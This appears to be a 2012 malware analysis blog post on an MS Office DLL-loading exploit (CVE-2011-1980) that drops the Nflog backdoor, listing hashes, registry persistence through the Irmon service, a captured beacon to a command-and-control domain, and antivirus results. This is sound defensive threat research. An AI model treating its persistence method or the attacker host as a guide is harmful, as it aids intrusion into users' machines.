[h=3]Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog[/h][h=2]Wednesday, February 15, 2012[/h]On February 9, 2012 Symantec disclosed that the previously patched MS Office insecure library loading vulnerability was exploited in the wild. DLL loading vulnerabilities were used in targeted attacks at least with two other exploits in 2011 and they did not reach epidemic proportions like it happend with CVE-2010-3333 RTF or some of the Adobe PDF exploits. I refer to Contagio: Sept. 23 CVE-2011-1991 type (1) deskpan.dll Windows components DLL loading vulnerability and Contagio: Apr 13 CVE-2011-2100 PDF - Adobe DLL Loading Vulnerability - Agenda.7z DLL search order hijacking exploits had and will have many new reincarnations because of the DLL loading preference order - Current Working Directory is preferred for most DLL files. You can read more about the root of these problems (not necessarily related to MS Office but in general) in M-unition: DLL Search Order Hijacking Revisited by Nick Harbour As described in the Symantec article, fputlsat.dll must be present in the same directory as the Word document in order to be activated by the ActiveX control embedded in the Word document. The payload of this sample is a backdoor trojan Nflog. [h=3][/h] [h=3][/h] [h=3]Common Vulnerabilities and Exposures (CVE)number[/h] [h=3] CVE-2011-1980 Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability."[/h] [h=3]Microsoft Security Bulletin MS11-073 - Important Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)[/h] Symantec: New Targeted Attack Using Office Exploit Found In The Wild by Joji Hamada [h=3][/h] [h=3][/h] [h=3]General File Information[/h] [h=3]File: 275c5ac2067d17187a71b94ccfdc4608.doc Size: 22016 MD5: 275C5AC2067D17187A71B94CCFDC4608[/h] [h=3]File: fputlsat.dll Size: 126976 MD5: 60068812B59E58D6338AAEBD649F9020[/h] [h=3]Download[/h] Download as a password protected archive (email me if you need the password) [TABLE] [TR] [TD][/TD] [TD][/TD] [/TR] [/TABLE] [h=3]File Desription[/h] [h=3]File: 275c5ac2067d17187a71b94ccfdc4608.doc Size: 22016 MD5: 275C5AC2067D17187A71B94CCFDC4608[/h] [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Before the document is open - DLL file is present is the same directory[/TD] [/TR] [/TABLE] The Word document has embedded macro - ActiveX List View Form Control, a very common ActiveX control, which calls fputlsat.dll "Microsoft Office FrontPage Client Utility Library". There is nothing unusual about this behavior, you can read more about this particular control here "Using the ListView ActiveX Control" and it is normal for it to call Frontpage libraries. The vulnerability presents itself in the in the fact that a DLL located in [TABLE=class: tr-caption-container] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD=class: tr-caption, align: center]After the document is open. DLL file is renamed to Thumbs.db[/TD] [/TR] [/TABLE] the same folder as the Word document will be used before the legitimate DLL in C:\Program Files\Microsoft Office\Office\.. or other directories. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Activity after the exploit launch[/TD] [/TR] [/TABLE] Examination of the ActiveX component shows the original path of the macro/control as it existed on the author's computer C:\Documents and Settings\Bandit\Local Settings\Temp\Word8.0\FPDTC.DLL (nice user name) Office 8.0 is office 97 (yes, eons ago) and FPDTC.DLL is a Front Page Design Time Control that was used around 2000-2001. Considering this, I wonder if this vulnerability not only existed but also was used with minor tweaks through all versions of MS Office - starting with Office 97 and ending with Office 2010 we finally found it out. Perhaps, Microsoft Office/VB gurus will be able to answer and / or correct me. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]List view control[/TD] [/TR] [/TABLE] Upon launch, the user is presented with a choice to Run or not to run ActiveX controls. By that time the exploit already worked and the files were dropped/renamed. Anwering Yes will allow the dropped payload iede32.ocx to run. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]ActiveX prompt.[/TD] [TD=class: tr-caption, align: center][/TD] [TD=class: tr-caption, align: center][/TD] [/TR] [/TABLE] The picture below shows locations of the dropped file and the registry changes. SVCHOST.EXE process injection [h=3]File: fputlsat.dll Size: 126976 MD5: 60068812B59E58D6338AAEBD649F9020 [/h] [h=3]fputlsat.dll (thumbs.db) strings[/h] [h=3]Unicode Strings: ---------------------------------------------------------------------------[/h] [h=3]Adobe Photoshop ---- ??? Adobe Photoshop 6.0 ----- ? Unknown if these artifacts mean anything. Photoshop is just as old. May be same DLL code was used for other products.[/h] [h=3]VS_VERSION_INFO StringFileInfo 040404b0 Comments CompanyName Microsoft Corporation FileDescription Microsoft Office FrontPage Client Utility Library FileVersion 11.0.5510.0 InternalName FP40CUTL LegalCopyright Copyright© Microsoft Corporation 2003. All rights reserved. LegalTrademarks OriginalFilename FP40CUTL PrivateBuild ProductName FP40CUTL.DLL -- Frontpage 2000 file. Wonder if Word 2000 was affected too. ProductVersion 11, 0, 0, 0 SpecialBuild VarFileInfo Translation[/h] [h=3]Created Files[/h] File: iede32.ocx Size: 13824 MD5: D4859FC951652B3C9657F8621D4DB625 Virustotal The trojan starts its activity POST /NfLog/Nfile.asp, this trojan is not new, for example there were Zero day CVE-2011-2462 files carrying the same trojan. The service modified is irmon (frequently abused by these types of attacks - here is a ThreatExpert report of a very common APT backdoor using the same service List of strings // Created : 14.02.2012 08:00 // Type : Name List 10001000: SUB_L10001000 10001010: CASE_10001064_PROC0001 10001021: CASE_10001064_PROC0002 10001033: CASE_10001064_PROC0000 1000105A: L1000105A 10001064: CASE_PROCTABLE_10001064 10001080: ServiceMain 1000113A: L1000113A 1000113F: L1000113F 10001152: L10001152 1000115F: L1000115F 10001170: SUB_L10001170 100011C0: L100011C0 100011D1: CASE_10001248_PROC0000 100011E7: CASE_10001248_PROC0004 100011F5: L100011F5 100011F8: CASE_10001248_PROC0001 10001214: CASE_10001248_PROC0002 10001230: CASE_10001248_PROC0003 10001248: CASE_PROCTABLE_10001248 10001260: InstallService 100012A6: L100012A6 100012D8: L100012D8 1000132D: L1000132D 10001339: L10001339 1000135A: L1000135A 1000135F: L1000135F 10001374: L10001374 1000139A: L1000139A 100013DC: L100013DC 10001465: L10001465 1000149F: L1000149F 100014D1: L100014D1 1000151C: L1000151C 10001531: L10001531 10001537: L10001537 1000153A: L1000153A 10001560: RundllInstallA 10001570: UninstallService 100015CD: L100015CD 100015E6: L100015E6 10001614: L10001614 10001628: L10001628 1000162E: L1000162E 1000163E: L1000163E 1000164A: L1000164A 10001660: RundllUninstallA 10001670: SUB_L10001670 100016D9: L100016D9 100016E0: L100016E0 10001726: L10001726 10001764: L10001764 10001789: L10001789 1000178B: L1000178B 100017A5: L100017A5 100017E0: SUB_L100017E0 100017FF: L100017FF 10001901: L10001901 100019CC: L100019CC 10001A8E: L10001A8E 10001A93: L10001A93 10001AA0: SUB_L10001AA0 10001AC5: L10001AC5 10001B03: L10001B03 10001B3B: L10001B3B 10001BF0: SUB_L10001BF0 10001C12: L10001C12 10001C2E: L10001C2E 10001C38: L10001C38 10001C40: SUB_L10001C40 10001C77: L10001C77 10001C80: SUB_L10001C80 10001C9D: L10001C9D 10001CB3: L10001CB3 10001CC9: L10001CC9 10001CD0: SUB_L10001CD0 10001E84: L10001E84 10001E90: SUB_L10001E90 10001EF0: SUB_L10001EF0 10001F57: L10001F57 10001F5D: L10001F5D 10001F71: L10001F71 10001FA7: L10001FA7 10001FCB: L10001FCB 1000200A: L1000200A 1000204B: L1000204B 1000208E: L1000208E 100020C0: SUB_L100020C0 1000212B: L1000212B 1000214F: L1000214F 1000215D: L1000215D 10002170: SUB_L10002170 10002180: L10002180 10002198: L10002198 100021A0: SUB_L100021A0 100021B0: SUB_L100021B0 10002238: L10002238 10002278: L10002278 10002288: L10002288 10002292: L10002292 100022EC: L100022EC 10002300: SUB_L10002300 1000239D: L1000239D 1000239F: L1000239F 100023E9: L100023E9 1000241D: L1000241D 10002446: L10002446 1000247D: L1000247D 100024B3: L100024B3 10002500: SUB_L10002500 10002520: SUB_L10002520 1000255B: L1000255B 100025B8: L100025B8 10002605: L10002605 1000260D: L1000260D 10002613: L10002613 10002630: SUB_L10002630 100026E5: L100026E5 100026FF: L100026FF 10002705: L10002705 10002708: L10002708 10002730: SUB_L10002730 100027D4: L100027D4 100027DA: L100027DA 100027E4: L100027E4 10002800: SUB_L10002800 1000288C: L1000288C 100028EC: L100028EC 100028F2: L100028F2 100028F5: L100028F5 10002920: L10002920 10002936: L10002936 1000293C: jmp_MSVCRT.dll!__CxxFrameHandler 10002950: jmp_MSVCRT.dll!_CxxThrowException 10002956: jmp_MSVCRT.dll!_except_handler3 1000295C: jmp_MSVCRT.dll!??3@YAXPAX@Z 10002962: jmp_MSVCRT.dll!??2@YAPAXI@Z 10002970: SUB_L10002970 1000297C: L1000297C 10002990: L10002990 1000299F: SUB_L1000299F 100029B5: L100029B5 100029DD: L100029DD 100029E1: L100029E1 10002A07: L10002A07 10002A1E: L10002A1E 10002A2F: L10002A2F 10002A34: L10002A34 10002A44: L10002A44 10002A47: L10002A47 10002A4A: EntryPoint 10002A66: L10002A66 10002A70: L10002A70 10002A82: L10002A82 10002A8C: L10002A8C 10002A8E: L10002A8E 10002A92: L10002A92 10002AAE: L10002AAE 10002AB7: L10002AB7 10002AC6: L10002AC6 10002ADD: L10002ADD 10002AE0: L10002AE0 10002AE8: jmp_MSVCRT.dll!??1type_info@@UAE@XZ 10002AEE: jmp_MSVCRT.dll!_initterm 10002B00: L10002B00 10002B10: L10002B10 10002B1B: L10002B1B 10002B30: L10002B30 10003000: ADVAPI32.dll!RegSetValueExA 10003004: ADVAPI32.dll!OpenServiceA 10003008: ADVAPI32.dll!DeleteService 1000300C: ADVAPI32.dll!RegOpenKeyExA 10003010: ADVAPI32.dll!RegQueryValueExA 10003014: ADVAPI32.dll!RegCloseKey 10003018: ADVAPI32.dll!OpenSCManagerA 1000301C: ADVAPI32.dll!CreateServiceA 10003020: ADVAPI32.dll!ChangeServiceConfig2A 10003024: ADVAPI32.dll!CloseServiceHandle 10003028: ADVAPI32.dll!RegisterServiceCtrlHandlerA 1000302C: ADVAPI32.dll!SetServiceStatus 10003030: ADVAPI32.dll!RegCreateKeyA 10003038: KERNEL32.dll!LoadLibraryA 1000303C: KERNEL32.dll!CloseHandle 10003040: KERNEL32.dll!SetFileTime 10003044: KERNEL32.dll!SystemTimeToFileTime 10003048: KERNEL32.dll!CreateFileA 1000304C: KERNEL32.dll!SetEvent 10003050: KERNEL32.dll!OpenEventA 10003054: KERNEL32.dll!GetLastError 10003058: KERNEL32.dll!Sleep 1000305C: KERNEL32.dll!GetModuleFileNameA 10003060: KERNEL32.dll!SetLastError 10003064: KERNEL32.dll!CreateEventA 10003068: KERNEL32.dll!WaitForSingleObject 1000306C: KERNEL32.dll!GetProcAddress 10003070: KERNEL32.dll!FreeConsole 10003074: KERNEL32.dll!GetSystemDirectoryA 10003078: KERNEL32.dll!FreeLibrary 10003080: MSVCRT.dll!??3@YAXPAX@Z 10003084: MSVCRT.dll!??2@YAPAXI@Z 10003088: MSVCRT.dll!atoi 1000308C: MSVCRT.dll!fwrite 10003090: MSVCRT.dll!fclose 10003094: MSVCRT.dll!fopen 10003098: MSVCRT.dll!strstr 1000309C: MSVCRT.dll!sprintf 100030A0: MSVCRT.dll!_snprintf 100030A4: MSVCRT.dll!_strupr 100030A8: MSVCRT.dll!??1type_info@@UAE@XZ 100030AC: MSVCRT.dll!free 100030B0: MSVCRT.dll!_initterm 100030B4: MSVCRT.dll!malloc 100030B8: MSVCRT.dll!_adjust_fdiv 100030BC: MSVCRT.dll!_beginthreadex 100030C0: MSVCRT.dll!_except_handler3 100030C4: MSVCRT.dll!__CxxFrameHandler 100030C8: MSVCRT.dll!strchr 100030CC: MSVCRT.dll!strncat 100030D0: MSVCRT.dll!strncpy 100030D4: MSVCRT.dll!wcstombs 100030D8: MSVCRT.dll!_stricmp 100030DC: MSVCRT.dll!_CxxThrowException 100030E4: WININET.dll!HttpEndRequestA 100030E8: WININET.dll!HttpSendRequestA 100030EC: WININET.dll!HttpAddRequestHeadersA 100030F0: WININET.dll!HttpOpenRequestA 100030F4: WININET.dll!InternetConnectA 100030F8: WININET.dll!InternetSetOptionA 100030FC: WININET.dll!InternetReadFile 10003100: WININET.dll!InternetCloseHandle 10003104: WININET.dll!HttpQueryInfoA 1000310C: WS2_32.dll!WS2_32.9 10003110: WS2_32.dll!WS2_32.52 10003114: WS2_32.dll!WSAIoctl 10003118: WS2_32.dll!WS2_32.116 1000311C: WS2_32.dll!WS2_32.3 10003120: WS2_32.dll!WS2_32.57 10003124: WS2_32.dll!WSASocketA 10003128: WS2_32.dll!WS2_32.115 1000312C: WS2_32.dll!WS2_32.16 10003130: WS2_32.dll!WS2_32.15 10003134: WS2_32.dll!WS2_32.2 10003138: WS2_32.dll!WS2_32.12 10003140: L10003140 1000314C: L1000314C 10003150: L10003150 10003160: L10003160 10003170: L10003170 10003180: L10003180 10003190: L10003190 10003198: L10003198 100031B0: L100031B0 100031B8: L100031B8 100031C8: L100031C8 100031E0: L100031E0 10003200: L10003200 10003220: L10003220 10003230: L10003230 10003240: L10003240 10003260: L10003260 10003270: L10003270 10003288: L10003288 10003298: L10003298 100032B8: L100032B8 100032C0: L100032C0 100032E0: L100032E0 100032F0: L100032F0 10003308: L10003308 10004000: L10004000 10004004: L10004004 10004020: SSZ10004020_www_aviraco_com 10004084: SSZ10004084__IElog 100040E8: L100040E8 100040F0: SSZ100040F0_Network_address_translation_for_ 100041F4: L100041F4 100041F8: SSZ100041F8_SvcHostDLL_exe 10004208: L10004208 10004218: L10004218 10004228: SSZ10004228_RegSetValueEx_ServiceDll_ 10004244: SSZ10004244_ServiceDll 10004250: SSZ10004250_GetModuleFileName___get_dll_path 10004274: SSZ10004274_RegCreateKey_Parameters_ 10004290: SSZ10004290_Parameters 1000429C: SSZ1000429C_SYSTEM_CurrentControlSet_Service 100042C0: SSZ100042C0_IPv6_Stack_Local_Support 100042DC: SSZ100042DC__SystemRoot__System32_svchost_ex 1000430C: SSZ1000430C_RegQueryValueEx_Svchost_netsvcs_ 10004330: SSZ10004330_netsvcs 10004338: SSZ10004338_SOFTWARE_Microsoft_Windows_NT_Cu 10004370: SSZ10004370_Irmon 10004378: SSZ10004378_IEcoreOk 10004384: SSZ10004384_ProcGo 1000438C: SSZ1000438C_GetFile 10004394: SSZ10004394__Nfile_asp 100043A0: L100043A0 100043A4: SSZ100043A4_POST 100043AC: SSZ100043AC_HTTP_1_1 100043B8: SSZ100043B8_Mozilla_4_0__compatible__MSIE_6_ 100043F0: SSZ100043F0_InternetOpenA 10004400: SSZ10004400_wininet_dll 1000440C: L1000440C 10004410: SSZ10004410_InternetSetOptionA 10004424: SSZ10004424_InternetReadFile 10004438: SSZ10004438_InternetConnectA 1000444C: SSZ1000444C_InternetCloseHandle 10004460: SSZ10004460_HttpSendRequestA 10004474: SSZ10004474_HttpQueryInfoA 10004484: SSZ10004484_HttpOpenRequestA 10004498: SSZ10004498_HttpEndRequestA 100044A8: SSZ100044A8__wininet_dll 100044B8: SSZ100044B8_ideo_dll 100044C4: SSZ100044C4_HTTP_1_0 100044D0: L100044D0 100044D4: L100044D4 100044D8: SSZ100044D8_1234567890 100044E4: SSZ100044E4__TestURL_asp 100044F4: L100044F4 100044F8: L100044F8 100044FC: L100044FC 10004500: SSZ10004500_www_microsoft_com 10004514: SSZ10004514_Mozilla_5_0__compatible__MSIE_7_ 10004548: SSZ10004548__s__d 10004550: L10004550 10004554: L10004554 10004558: SSZ10004558_Proxy_Authorization__Basic_ 10004574: SSZ10004574_HEAD 10004580: L10004580 100045A0: L100045A0 100045A4: L100045A4 100045A8: L100045A8 100045AC: L100045AC 100045B0: L100045B0 1000463D: L1000463D 1000483D: L1000483D 1000485D: L1000485D 10004A5D: L10004A5D 10004AE0: L10004AE0 10004AE4: L10004AE4 10004AE8: L10004AE8 10004AEC: L10004AEC 10004AF0: L10004AF0 10004AF4: L10004AF4 10004AF8: L10004AF8 10004AFC: L10004AFC 10004B00: L10004B00 10004B04: L10004B04 10004B08: L10004B08 10004B0C: L10004B0C 10004B10: L10004B10 10004B14: L10004B14 10004F18: L10004F18 10005F1C: L10005F1C 10005F2C: L10005F2C 10005F3C: L10005F3C 10005F40: L10005F40 10006144: L10006144 10006244: L10006244 10006248: L10006248 1000624C: L1000624C 10006250: L10006250 10006254: L10006254 Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters Class Name: <NO CLASS> Last Write Time: 2/14/2012 - 1:40 AM Value 0 Name: ServiceDll Type: REG_EXPAND_SZ Data: C:\WINDOWS\system32\iede32.ocx [h=3]Traffic[/h] In my case, CC was not active or at least I didn't receive any traffic but you can see the initial POST and the domain name. POST /IElog/TestURL.asp HTTP/1.0 User-Agent: www Host: www.aviraco.com Content-Length: 10 Pragma: no-cache 1234567890HTTP/1.1 400 Bad Request Content-Type: text/html Date: Tue, 14 Feb 2012 05:39:57 GMT Connection: close Content-Length: 39 <h1>Bad Request (Invalid Hostname)</h1> Domain Name : aviraco.com PunnyCode : aviraco.com Creation Date : 2011-03-30 10:31:10 Updated Date : 2011-03-30 10:31:10 Expiration Date : 2012-03-30 10:31:10 Registrant: Organization : zhipengwang Name : zhipengwang Address : Zhongguancun Hailong Building, Room 1005 City : haidianqu Province/State : beijingshi Country : china Postal Code : 100083 216.83.63.147 Host reachable, 408 ms. average 216.83.32.0 - 216.83.63.255 Ethr.Net LLC 7960B Soquel Dr. #417 Aptos CA 95003 United States [TABLE] [TR] [TD]IP Address History Event Date Action Pre-Action IP Post-Action IP 2009-12-28 New -none- 174.37.172.68 2010-09-13 Change 174.37.172.68 67.228.81.181 2010-09-24 Change 67.228.81.181 174.37.172.68 2011-02-02 Change 174.37.172.68 67.228.81.180 2011-02-13 Not Resolvable 67.228.81.180 -none- 2011-10-14 New -none- 98.126.113.28 2011-10-25 Change 98.126.113.28 216.83.63.14 Registrar History Date Registrar 2009-12-26 Name.com aka DomainSite 2011-03-29 Xin Net Name Server History Event Date Action Pre-Action Server Post-Action Server 2009-12-28 New -none- Name.com 2011-02-08 Delete Name.com -none- 2011-03-31 New Xinnet.cn Xinnetdns.com 2011-12-13 Transfer Xinnetdns.com Xincache.com RR www.comedns.com. A 216.83.63.147 www.creamofa.com. A 216.83.63.147[/TD] [TD][/TD] [/TR] [/TABLE] [h=3]Automated Scans[/h] Virustotal SHA256: 429f206f2c68014c75f8a6ae09e68dd672401e461dd2fa72b9087bb5ee530d1e SHA1: 7dbf130964cdc0110fd517a5d98188df3d56e850 MD5: 275c5ac2067d17187a71b94ccfdc4608 File size: 21.5 KB ( 22016 bytes ) File name: report.doc File type: MS Word Document Detection ratio: 17 / 43 Analysis date: 2012-02-15 04:10:05 UTC ( 46 minutes ago ) Antivirus Result Update AhnLab-V3 Dropper/Ms11-073 20120213 AVG Exploit_c.UDK 20120213 ClamAV Exploit.Doc-2 20120214 Emsisoft Exploit.MSWord.CVE-2011!IK 20120214 eSafe - 20120213 eTrust-Vet - 20120213 Fortinet W97M/CVE_2011_1980.A!exploit 20120214 Ikarus Exploit.MSWord.CVE-2011 20120214 Kaspersky Exploit.MSWord.CVE-2011-1980.a 20120214 McAfee Exploit-CVE2011-1980 20120214 McAfee-GW-Edition - 20120213 Microsoft Exploit:Win32/Actjack.A 20120213 NOD32 W97M/Exploit.CVE-2011-1980.A 20120214 nProtect Trojan-Exploit/W32.Agent.22016 20120213 PCTools Trojan.Generic 20120207 Sophos Troj/Hijack-H 20120214 SUPERAntiSpyware - 20120206 Symantec Trojan.Activehijack 20120214 TrendMicro TROJ_ACTIVEHIJ.A 20120213 TrendMicro-HouseCall TROJ_ACTIVEHIJ.A 20120214 ViRobot Doc.S.MS11-073.22016 20120213 Virustotal SHA256: 48bc6c0df3302f7eaa6061c4f3b0357b4c512d5bd6f6088abc6fc274f2efc5aa SHA1: 8f86b7fcaf0c1ee9b795fa8e559def47ef468128 MD5: 60068812b59e58d6338aaebd649f9020 File size: 124.0 KB ( 126976 bytes ) File name: fputlsat.dll File type: Win32 DLL Detection ratio: 28 / 43 Analysis date: 2012-02-15 04:10:02 UTC ( 23 minutes ago ) AhnLab-V3 Win-Trojan/Activehijack.126976 20120213 AntiVir TR/Drop.Kaliox.A 20120213 Avast Win32:Malware-gen 20120214 BitDefender Trojan.Generic.KD.529689 20120214 DrWeb Trojan.MulDrop3.34467 20120214 Emsisoft Trojan-Dropper.Win32.Agent!IK 20120214 F-Secure Trojan.Generic.KD.529689 20120214 Fortinet W32/Agent.PRG!tr 20120214 GData Trojan.Generic.KD.529689 20120214 Ikarus Trojan-Dropper.Win32.Agent 20120214 K7AntiVirus Riskware 20120213 Kaspersky Trojan-Dropper.Win32.Agent.gjnt 20120214 McAfee Generic Dropper.p 20120214 McAfee-GW-Edition Artemis!60068812B59E 20120213 Microsoft TrojanDropper:Win32/Kaliox.A 20120213 NOD32 Win32/TrojanDropper.Agent.PRG 20120214 Norman W32/Agent.XGSO 20120213 nProtect Trojan-Dropper/W32.Agent.126976.CS 20120213 PCTools Trojan.Dropper 20120207 Symantec Trojan.Dropper 20120214 TrendMicro TROJ_MULDROP.IC 20120213 TrendMicro-HouseCall TROJ_MULDROP.IC 20120214 VIPRE Trojan.Win32.Generic!BT 20120214 ViRobot Trojan.Win32.Activehijack.126976 20120213 VirusBuster Trojan.DR.Agent!ly6ZRARwo6A Virustotal SHA256: 27c87e7993c5661dd3b65e51df5884519fc0234bf36de72082644fa909ccb793 SHA1: d0c3e34bd97c4aa56fe9f176954d274595926a32 MD5: d4859fc951652b3c9657f8621d4db625 File size: 13.5 KB ( 13824 bytes ) File name: iede32.ocx File type: Win32 DLL Detection ratio: 28 / 42 Analysis date: 2012-02-14 04:13:46 UTC ( 1 day, 2 hours ago ) 0 AhnLab-V3 Win-Trojan/Activehijack.13824 20120213 AntiVir TR/Spy.13824.71 20120214 Antiy-AVL Trojan/Win32.Genome.gen 20120213 BitDefender Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214 Comodo TrojWare.Win32.GameThief.Nilage.~CRSH 20120214 DrWeb Trojan.Click2.13847 20120214 Emsisoft Trojan.Win32.Spy!IK 20120214 eSafe Win32.GenHeur.LP.Aq@ 20120213 F-Secure Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214 Fortinet W32/Agent.OLJ 20120214 GData Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214 Ikarus Trojan.Win32.Spy 20120214 K7AntiVirus Riskware 20120213 Kaspersky Trojan.Win32.Genome.aehtz 20120214 McAfee Generic Dropper.p 20120214 McAfee-GW-Edition Artemis!D4859FC95165 20120213 Microsoft TrojanDownloader:Win32/Kaliox.A 20120213 NOD32 Win32/Agent.OLJ 20120214 Norman W32/Troj_Generic.KIKX 20120213 nProtect Trojan/W32.Genome.13824.J 20120213 Sophos Troj/Spy-YL 20120214 Symantec Trojan.Gen.2 20120214 TheHacker Trojan/Agent.olj 20120213 TrendMicro BKDR_CONIP.A 20120214 TrendMicro-HouseCall BKDR_CONIP.A 20120214 ViRobot Trojan.Win32.Activehijack.13824 20120214 VirusBuster Trojan.Agent!KGIS/NcFcUc 20120213 Sursa: contagio: Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog